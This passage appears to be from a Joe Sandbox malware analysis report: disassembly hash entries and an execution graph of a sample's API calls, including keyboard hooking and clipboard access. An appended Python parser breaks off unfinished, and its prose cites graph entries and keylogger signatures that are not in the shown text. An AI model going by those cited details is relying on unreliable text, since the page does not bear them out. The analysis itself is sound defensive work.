                                • Instruction ID: 9a03baa7e4c81fef334158de4d6ce7fb2cd37e1adec76c5d88a68d008dbd96e0
                                • Opcode Fuzzy Hash: 8d0df1192519807b53f02657049519ccfaf027129fe7af5da912b460d2e8016d
                                • Instruction Fuzzy Hash: 9641D2B1D0030CDBDB24CFE9C984A9DBFB5BF48304F248129E919AB210D7756A4ACF94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8272312cf67dc49beadc96a4309f8990a6255001f2138f1222bd36ecd426b712
                                • Instruction ID: 7ee22811f4e7dc90ede0f4c794c52f6232eec8de7c4a95738b160f77c33dbbe4
                                • Opcode Fuzzy Hash: 8272312cf67dc49beadc96a4309f8990a6255001f2138f1222bd36ecd426b712
                                • Instruction Fuzzy Hash: 6C31E674E142199FCB04CFEAD8459EEBBF2FB88300F108429E515A7214DB355A41CF94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6e464ece5292554170b1c0fa158a68ef68d3378e0095e145f45667e48db07e7
                                • Instruction ID: 746c254e6f8976e94a907d110467a28c4a08c83b92fbeaff79dbdc8d9dd27f97
                                • Opcode Fuzzy Hash: a6e464ece5292554170b1c0fa158a68ef68d3378e0095e145f45667e48db07e7
                                • Instruction Fuzzy Hash: 92310774E142199FCB04CFAAE8459EEFBB2FB88301F14C42AE511A7354DB349A41CF94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf79a43a714a3191a7d012d7a343543e169e6adefca529355a75b82518a3d61d
                                • Instruction ID: d742419e844ba81a64591aa2c38beadd88d32d4d867ec305a8a80b0f35986a13
                                • Opcode Fuzzy Hash: bf79a43a714a3191a7d012d7a343543e169e6adefca529355a75b82518a3d61d
                                • Instruction Fuzzy Hash: 41215C75B003155FDB16EBB88858ABFBBBBEFC82507148929E816D7240EE348D058751
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 303c2f5868f348b83df08b8ebfc48feeee1a0d3fa4e29e252e380ddc20549143
                                • Instruction ID: bb2006cb17fd27ef2892acaa78af05d9bc04fca3b0548fd2c3180e1de7713b90
                                • Opcode Fuzzy Hash: 303c2f5868f348b83df08b8ebfc48feeee1a0d3fa4e29e252e380ddc20549143
                                • Instruction Fuzzy Hash: 5B2128B1504204DFDF19DF94E9C0B66BF65FB88324F20C16DD9090B696C336E456CBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f15872d2f8ae15ab4bcb7eb2c31e0a1b35845f1f31874dff8b8d39270181ee06
                                • Instruction ID: 9285fb826ac76cec801856e1782d91114f81b2995c607eee3d3dc18c677a6e73
                                • Opcode Fuzzy Hash: f15872d2f8ae15ab4bcb7eb2c31e0a1b35845f1f31874dff8b8d39270181ee06
                                • Instruction Fuzzy Hash: EB212572544240DFDF19DF94E9C0B26BF75FB88318F60C569E8090B296C336D456CBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e37b7a7e755591af39852e6766fc4f6cbe7debb83d234ba484a4e9fdee931ed
                                • Instruction ID: 54a38188b3b357fc3559c88042eec4cb8d8b561c086b3ea7d419f49611587d81
                                • Opcode Fuzzy Hash: 8e37b7a7e755591af39852e6766fc4f6cbe7debb83d234ba484a4e9fdee931ed
                                • Instruction Fuzzy Hash: 0C212B32A082099FCB04DBA5DC54DEE7BBAEFC5220B45C47BF514EB110DB309904C790
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52058cdc193c024d26d09c8a2dbed3a5ea2c3f0f5543c1cd4bfc8ef58f8ae711
                                • Instruction ID: 1ddf4dc2d43787654430a6aadd679675d47135bd942f62835d1739eef5824ded
                                • Opcode Fuzzy Hash: 52058cdc193c024d26d09c8a2dbed3a5ea2c3f0f5543c1cd4bfc8ef58f8ae711
                                • Instruction Fuzzy Hash: BB212271604700DFDF19DF94E888B26BFA1FB88314F28C56DE80A0B242C336D447CA62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06562f248440073252ea61bbc65fc0b96485303f9c7646109e7e94e8cfd1f285
                                • Instruction ID: cae02ce5c40d95cbb7b46679e1cd43d4958a84cb3011bb1a2c30920550ef7541
                                • Opcode Fuzzy Hash: 06562f248440073252ea61bbc65fc0b96485303f9c7646109e7e94e8cfd1f285
                                • Instruction Fuzzy Hash: 8221F275504601EFDF09DFD4E9C8B26BBA5FB88324F20C56DE8494B292C336D456CA62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3790ed8fb72fe2387f7ea50fc0dc7012ce13e8a9ec93a0806deba262dc1c3b6d
                                • Instruction ID: 07e483d5e489878ad022b635e3b64ff0ab29bd49faa2c603843ba7c6ea73adfc
                                • Opcode Fuzzy Hash: 3790ed8fb72fe2387f7ea50fc0dc7012ce13e8a9ec93a0806deba262dc1c3b6d
                                • Instruction Fuzzy Hash: 8E31E0B0C013189FDB20DFDAC584BDEBBF5BB48714F248029E508BB240C7B55845CBA4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5756da73116fa542434870866c6a4fe07ff5f0d0e9bd798578c1d946cc64a628
                                • Instruction ID: bdff0d3a9219973e2fc93f914db23a71471444d14edc140aa53a3d84d4f276e6
                                • Opcode Fuzzy Hash: 5756da73116fa542434870866c6a4fe07ff5f0d0e9bd798578c1d946cc64a628
                                • Instruction Fuzzy Hash: E621C2755097808FCB07CF64D994715BFB1EB46214F28C1EAD8498F6A3C33A980ACB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f25a58325400133481ff877ddd61d05b3dddc06db440120a1045ae6828334a9
                                • Instruction ID: 26526e80e9a72f1f45190376374012abbd3f1e8ce2fbd3627da5f27c2a517a86
                                • Opcode Fuzzy Hash: 3f25a58325400133481ff877ddd61d05b3dddc06db440120a1045ae6828334a9
                                • Instruction Fuzzy Hash: 9A110A31F0021A8BCB58EBF9D9109EEBAB6BB89710B50447AD515E7240EF328D15CBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 846b45c079aa667063bbbdf0f5f27eeb9975bd7b401eaa3b92ee105a6b9a4757
                                • Instruction ID: 7ba8322057476b1709dbe8217bdebc09933650c36804091709b204879a9882ee
                                • Opcode Fuzzy Hash: 846b45c079aa667063bbbdf0f5f27eeb9975bd7b401eaa3b92ee105a6b9a4757
                                • Instruction Fuzzy Hash: 90213A70E10209DFDB44DFE9C545AAEBBF2FF48305F148469E519AB250DB309A40CF95
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f32bcc07b90a254db9d116c8bb8c6036931421b27c3f1f84e5d3653cdeb7f1e8
                                • Instruction ID: 592dc92b9465a924d66c6efd1188b07aa7b0c8cb4ae78d03a885392a49670caf
                                • Opcode Fuzzy Hash: f32bcc07b90a254db9d116c8bb8c6036931421b27c3f1f84e5d3653cdeb7f1e8
                                • Instruction Fuzzy Hash: 742114B580434D9FCB10CF9AC884BDEBBF4FB88320F148429E959A7200C374A954CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 41050bd593ec72aa37f9940ce7e02a657212c4acf1bda98d9983e3bc71f36293
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: AD11CD72404240DFCF16CF44D5C4B56BF61FB84324F2482A9D8090A657C33AE45ACBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction ID: 2fce78b49231a5a872f88c3ce5036a8c2699f6d8275f45d38ec1add38526582f
                                • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                • Instruction Fuzzy Hash: 4E119D76504280DFCF16CF54E5C4B16BF71FB84318F2486A9D8490B656C33AD45ACBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction ID: 9fe5f525cc515f9c373a10d675c6fbdc8419cb04a5e1cd0d8f22561e8cf60740
                                • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                • Instruction Fuzzy Hash: 9111BB75504680DFCB06CF94D5C8B15FBA1FB84324F24C6A9D8494B696C33AD44ACB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea0a38a8078721113e6fa393bb6d57ddd1d6ee27448267775ebc28d77898bb61
                                • Instruction ID: 42a7af216ea4322694eb147e0573888e982c2f4b2ba47b76842a99b9f0751650
                                • Opcode Fuzzy Hash: ea0a38a8078721113e6fa393bb6d57ddd1d6ee27448267775ebc28d77898bb61
                                • Instruction Fuzzy Hash: 9111F5B5904648CFDB20DF9AC484BDEFBF4EB48310F148469E959A7240C379A944CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9214be2a109b69e4cab517695df699cd5e84ee2adf5a5d01ecfeb5a457e28fd4
                                • Instruction ID: 8418311fed6d3a97f6767dc3247ac679c0760eeca6c2b02b17f55e7e83716911
                                • Opcode Fuzzy Hash: 9214be2a109b69e4cab517695df699cd5e84ee2adf5a5d01ecfeb5a457e28fd4
                                • Instruction Fuzzy Hash: 5FF06D71D043899BCB15DFB8C8046ADBBB0AB05314F4086ECD990A7282DB325250DB91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 16761be50c4885f5353b8b4366c0d07cbaa23826c047350995cd9dd7b3e69587
                                • Instruction ID: c23494de5d348a6e6aae842d67f86da37cb12da07764f4369ee594dd4ce34eca
                                • Opcode Fuzzy Hash: 16761be50c4885f5353b8b4366c0d07cbaa23826c047350995cd9dd7b3e69587
                                • Instruction Fuzzy Hash: 75E0C2B4D00318AFCB44EFA8C9016AEBBB5FB08301F5086AED854A3340DB719651EB94
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 153232b853ced126d53e3fea3187ead1f390a3d20c4b908d8c454f94b0e6deb1
                                • Instruction ID: c9a2822d61ce336628f4a9f236fd47954414288a5b7971c7ba8ea5fded154654
                                • Opcode Fuzzy Hash: 153232b853ced126d53e3fea3187ead1f390a3d20c4b908d8c454f94b0e6deb1
                                • Instruction Fuzzy Hash: 4AE09A74D102089FCB44DFA9D545A5CBBF4EF09611F0081EDD818D7750E6349940DF45
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15a949e7224143ec8c51621cc190bd6154cffcdc4eb7349b8953c1cf07673dd1
                                • Instruction ID: a0acb3bd1d593b902756202f5d310d0b93a01b2adfdae039dc5787d1f5d6907b
                                • Opcode Fuzzy Hash: 15a949e7224143ec8c51621cc190bd6154cffcdc4eb7349b8953c1cf07673dd1
                                • Instruction Fuzzy Hash: 4CE0E6B0D11309EFC704FFA4EA415AD7BB5FB44214710C569D805A7300DA376F109B95
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57f2e6dc1d2810c8f5ec090bcb52a66ff35022b4bc46e9d06ae3ece4919d6307
                                • Instruction ID: 25a19d743b15c7f046c9d312ddad3f4a34f91a13f358b0105c44d6ef38d4b7ae
                                • Opcode Fuzzy Hash: 57f2e6dc1d2810c8f5ec090bcb52a66ff35022b4bc46e9d06ae3ece4919d6307
                                • Instruction Fuzzy Hash: 90C04C370000105BDB01E68CC9A5FC6B7E6AF54714F849062E58486161E625D528AB45
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7280e565f2d2f06a8478debb1722ccb440bb4a9a010bfa2345a362ab0bfe0351
                                • Instruction ID: f41dee5b15f7b006efeedd0a812611bf6ae36b07a3812e4aa2405fff7de3077a
                                • Opcode Fuzzy Hash: 7280e565f2d2f06a8478debb1722ccb440bb4a9a010bfa2345a362ab0bfe0351
                                • Instruction Fuzzy Hash: 1EC08C30040704CFC3046BF4BA0E764766A7B02202F042115F22E41420DBF00010C729
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 372042f4d1f10ff79e1df4028beb1b9e24a1b61416f96bbc52cb204033ab760a
                                • Instruction ID: 326a07d632f3e96d0b5f20d83b767c1e6823a4ddda710cc7083e42696e40de87
                                • Opcode Fuzzy Hash: 372042f4d1f10ff79e1df4028beb1b9e24a1b61416f96bbc52cb204033ab760a
                                • Instruction Fuzzy Hash: A8C04C361441009B8A02E7D4C594D2977A2FF993007409866764545021DA218928EB56
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c39a327594e4186c56d63ac0edd4abda0eafdaf3957453e644ff827f76cec772
                                • Instruction ID: 7cede228494334d0487dde92ba2836c3e4171249cf127f644eb69fd81db6b8c8
                                • Opcode Fuzzy Hash: c39a327594e4186c56d63ac0edd4abda0eafdaf3957453e644ff827f76cec772
                                • Instruction Fuzzy Hash: 43B09235659341A39501A2E54999E2A5226ABA9705B41CC29370E4000098258834A21F

                                Execution Graph

                                Execution Coverage:12.2%
                                Dynamic/Decrypted Code Coverage:92.7%
                                Signature Coverage:0%
                                Total number of Nodes:179
                                Total number of Limit Nodes:20
                                execution_graph 28716 5e1e120 28717 5e1e12b 28716->28717 28719 5e1e13b 28717->28719 28720 5e1db90 28717->28720 28721 5e1e170 OleInitialize 28720->28721 28722 5e1e1d4 28721->28722 28722->28719 28723 5e1fe08 28724 5e1fe4c SetWindowsHookExA 28723->28724 28726 5e1fe92 28724->28726 28853 5e1c6d8 DuplicateHandle 28854 5e1c76e 28853->28854 28855 5e18978 28856 5e189e0 CreateWindowExW 28855->28856 28858 5e18a9c 28856->28858 28727 5e178ca 28728 5e178d0 GetModuleHandleW 28727->28728 28730 5e17945 28728->28730 28731 f1d01c 28733 f1d034 28731->28733 28732 f1d08e 28733->28732 28738 5e18b22 28733->28738 28742 5e18b30 28733->28742 28746 5e1d2b1 28733->28746 28754 5e16c24 28733->28754 28739 5e18b30 28738->28739 28740 5e16c24 2 API calls 28739->28740 28741 5e18b77 28740->28741 28741->28732 28743 5e18b56 28742->28743 28744 5e16c24 2 API calls 28743->28744 28745 5e18b77 28744->28745 28745->28732 28749 5e1d2ba 28746->28749 28747 5e1d341 28774 5e1c28c 28747->28774 28749->28747 28750 5e1d331 28749->28750 28762 5e1d468 28750->28762 28768 5e1d458 28750->28768 28751 5e1d33f 28757 5e16c2f 28754->28757 28755 5e1d341 28756 5e1c28c 2 API calls 28755->28756 28759 5e1d33f 28756->28759 28757->28755 28758 5e1d331 28757->28758 28760 5e1d468 2 API calls 28758->28760 28761 5e1d458 2 API calls 28758->28761 28760->28759 28761->28759 28764 5e1d476 28762->28764 28763 5e1c28c 2 API calls 28763->28764 28764->28763 28765 5e1d552 28764->28765 28781 5e1d948 28764->28781 28786 5e1d939 28764->28786 28765->28751 28770 5e1d45c 28768->28770 28769 5e1c28c 2 API calls 28769->28770 28770->28769 28771 5e1d552 28770->28771 28772 5e1d939 OleGetClipboard 28770->28772 28773 5e1d948 OleGetClipboard 28770->28773 28771->28751 28772->28770 28773->28770 28775 5e1c291 28774->28775 28776 5e1d654 28775->28776 28777 5e1d5aa 28775->28777 28778 5e16c24 OleGetClipboard 28776->28778 28779 5e1d602 CallWindowProcW 28777->28779 28780 5e1d5b1 28777->28780 28778->28780 28779->28780 28780->28751 28782 5e1d949 
28781->28782 28783 5e1d9ee 28782->28783 28791 5e1df00 28782->28791 28798 5e1debf 28782->28798 28783->28764 28787 5e1d93c 28786->28787 28788 5e1d9ee 28787->28788 28789 5e1df00 OleGetClipboard 28787->28789 28790 5e1debf OleGetClipboard 28787->28790 28788->28764 28789->28787 28790->28787 28792 5e1df08 28791->28792 28793 5e1df1c 28792->28793 28797 5e1debf OleGetClipboard 28792->28797 28817 5e1df48 28792->28817 28829 5e1df38 28792->28829 28793->28782 28794 5e1df31 28794->28782 28797->28794 28799 5e1decc 28798->28799 28800 5e1df37 28799->28800 28804 5e1deda 28799->28804 28802 5e1df75 28800->28802 28806 5e1dfb9 28800->28806 28801 5e1df1c 28801->28782 28814 5e1df48 OleGetClipboard 28802->28814 28815 5e1df38 OleGetClipboard 28802->28815 28816 5e1debf OleGetClipboard 28802->28816 28803 5e1df7b 28803->28782 28804->28801 28809 5e1df48 OleGetClipboard 28804->28809 28810 5e1df38 OleGetClipboard 28804->28810 28811 5e1debf OleGetClipboard 28804->28811 28805 5e1df31 28805->28782 28808 5e1e039 28806->28808 28812 5e1e200 OleGetClipboard 28806->28812 28813 5e1e210 OleGetClipboard 28806->28813 28807 5e1e057 28807->28782 28808->28782 28809->28805 28810->28805 28811->28805 28812->28807 28813->28807 28814->28803 28815->28803 28816->28803 28818 5e1df4d 28817->28818 28819 5e1df75 28818->28819 28826 5e1dfb9 28818->28826 28823 5e1df48 OleGetClipboard 28819->28823 28824 5e1df38 OleGetClipboard 28819->28824 28825 5e1debf OleGetClipboard 28819->28825 28820 5e1df7b 28820->28794 28821 5e1e057 28821->28794 28822 5e1e039 28822->28794 28823->28820 28824->28820 28825->28820 28826->28822 28841 5e1e200 28826->28841 28845 5e1e210 28826->28845 28830 5e1df48 28829->28830 28831 5e1df75 28830->28831 28833 5e1dfb9 28830->28833 28836 5e1df48 OleGetClipboard 28831->28836 28837 5e1df38 OleGetClipboard 28831->28837 28838 5e1debf OleGetClipboard 28831->28838 28832 5e1df7b 28832->28794 28835 5e1e039 28833->28835 28839 5e1e200 OleGetClipboard 28833->28839 28840 5e1e210 OleGetClipboard 28833->28840 28834 5e1e057 
28834->28794 28835->28794 28836->28832 28837->28832 28838->28832 28839->28834 28840->28834 28843 5e1e210 28841->28843 28844 5e1e24b 28843->28844 28849 5e1dca8 28843->28849 28844->28821 28847 5e1e225 28845->28847 28846 5e1dca8 OleGetClipboard 28846->28847 28847->28846 28848 5e1e24b 28847->28848 28848->28821 28850 5e1e2b8 OleGetClipboard 28849->28850 28852 5e1e352 28850->28852 28859 f60848 28861 f6084e 28859->28861 28860 f6091b 28861->28860 28863 f61380 28861->28863 28864 f61396 28863->28864 28865 f61498 28864->28865 28868 5e158e0 28864->28868 28874 5e158cb 28864->28874 28865->28861 28870 5e158f2 28868->28870 28869 5e159a3 28869->28864 28870->28869 28880 5e103a4 28870->28880 28872 5e15969 28885 5e103c4 28872->28885 28876 5e158f2 28874->28876 28875 5e159a3 28875->28864 28876->28875 28877 5e103a4 GetModuleHandleW 28876->28877 28878 5e15969 28877->28878 28879 5e103c4 KiUserCallbackDispatcher 28878->28879 28879->28875 28881 5e103af 28880->28881 28889 5e16e91 28881->28889 28895 5e16ea0 28881->28895 28882 5e15f4a 28882->28872 28886 5e103cf 28885->28886 28888 5e1d893 28886->28888 28926 5e1c2e4 28886->28926 28888->28869 28890 5e16ea0 28889->28890 28901 5e173f0 28890->28901 28891 5e16f4e 28892 5e15e3c GetModuleHandleW 28891->28892 28893 5e16f7a 28891->28893 28892->28893 28896 5e16ecb 28895->28896 28900 5e173f0 GetModuleHandleW 28896->28900 28897 5e16f4e 28898 5e15e3c GetModuleHandleW 28897->28898 28899 5e16f7a 28897->28899 28898->28899 28900->28897 28902 5e1744d 28901->28902 28903 5e174ce 28902->28903 28906 5e17683 28902->28906 28914 5e175ef 28902->28914 28907 5e176af 28906->28907 28922 5e15e3c 28907->28922 28909 5e1771a 28910 5e15e3c GetModuleHandleW 28909->28910 28913 5e17794 28909->28913 28911 5e17768 28910->28911 28912 5e15e3c GetModuleHandleW 28911->28912 28911->28913 28912->28913 28913->28903 28915 5e175fa 28914->28915 28916 5e15e3c GetModuleHandleW 28915->28916 28917 5e1771a 28916->28917 28918 5e15e3c GetModuleHandleW 28917->28918 28921 5e17794 28917->28921 28919 
5e17768 28918->28919 28920 5e15e3c GetModuleHandleW 28919->28920 28919->28921 28920->28921 28921->28903 28923 5e178d0 GetModuleHandleW 28922->28923 28925 5e17945 28923->28925 28925->28909 28927 5e1c2e9 KiUserCallbackDispatcher 28926->28927 28929 5e1d916 28927->28929 28929->28886
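The `execution_graph` dump above, and the `control_flow_graph` entries that follow it, are printed as one whitespace-separated token stream: a decimal node id followed by a hex address (or a `start-end` address range), optional annotation tokens such as an API name, `2 API calls` or `call f60ab8`, and `src->dst` edge tokens. The parser below is an added example for reading that stream and pulling out what a triager wants first: which nodes call which Win32 APIs, and the chain of function addresses that leads from an entry node to the `SetWindowsHookExA` / `OleGetClipboard` / `CreateWindowExW` calls behind the keylogger and clipboard-capture signatures. It is not part of the Joe Sandbox report or tooling; the grammar is inferred from this page (the id-then-address rule and the CamelCase test for API names are heuristics), and the two excerpts are trimmed copies of the execution graph and the first control-flow graph shown above, including a line wrap inside a node to show that the tokenizer does not care where the report wrapped.

```python
"""Parse Joe Sandbox execution_graph / control_flow_graph text dumps (added example)."""
import re
from collections import defaultdict, deque

# Heuristics inferred from the dump, not a published grammar: node ids are decimal,
# addresses are lowercase hex or a hex range, so an id is only recognised when an
# address token follows it.  Win32 API names are CamelCase, which excludes the
# '2 API calls' and 'call f60ab8' annotations.
ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
API_RE = re.compile(r"^[A-Z][a-z]+[A-Za-z0-9]*$")

# Trimmed from the execution_graph above; the wrap before '2 API calls' is deliberate.
EXEC_EXCERPT = """execution_graph 28716 5e1e120 28717 5e1e12b 28716->28717 28719 5e1e13b 28717->28719
28720 5e1db90 28717->28720 28721 5e1e170 OleInitialize 28720->28721 28722 5e1e1d4 28721->28722
28722->28719 28723 5e1fe08 28724 5e1fe4c SetWindowsHookExA 28723->28724 28726 5e1fe92 28724->28726
28853 5e1c6d8 DuplicateHandle 28854 5e1c76e 28853->28854 28855 5e18978 28856 5e189e0 CreateWindowExW
28855->28856 28858 5e18a9c 28856->28858 28738 5e18b22 28739 5e18b30 28738->28739 28740 5e16c24
2 API calls 28739->28740 28741 5e18b77 28740->28741"""

# Trimmed from the first control_flow_graph record (function f64828) on this page.
CFG_EXCERPT = """control_flow_graph 570 f64828-f648b4 573 f648b6-f648c1 574 f648fe-f64900 570->573
570->574 573->574 603 f64a37-f64a3b 604 f64a29-f64a2d 605 f64a2f-f64a32 call f60ab8 604->605
605->603 606 f64a3d-f64a41 611 f64a43-f64a46 call f60ab8 606->611 611->607 607 f64a4b-f64a4f"""


def parse_graph(text):
    """Return (graph_name, nodes, edges); nodes maps id -> {'addr': str, 'annot': [tokens]}."""
    tokens = text.split()                    # newlines are just whitespace here
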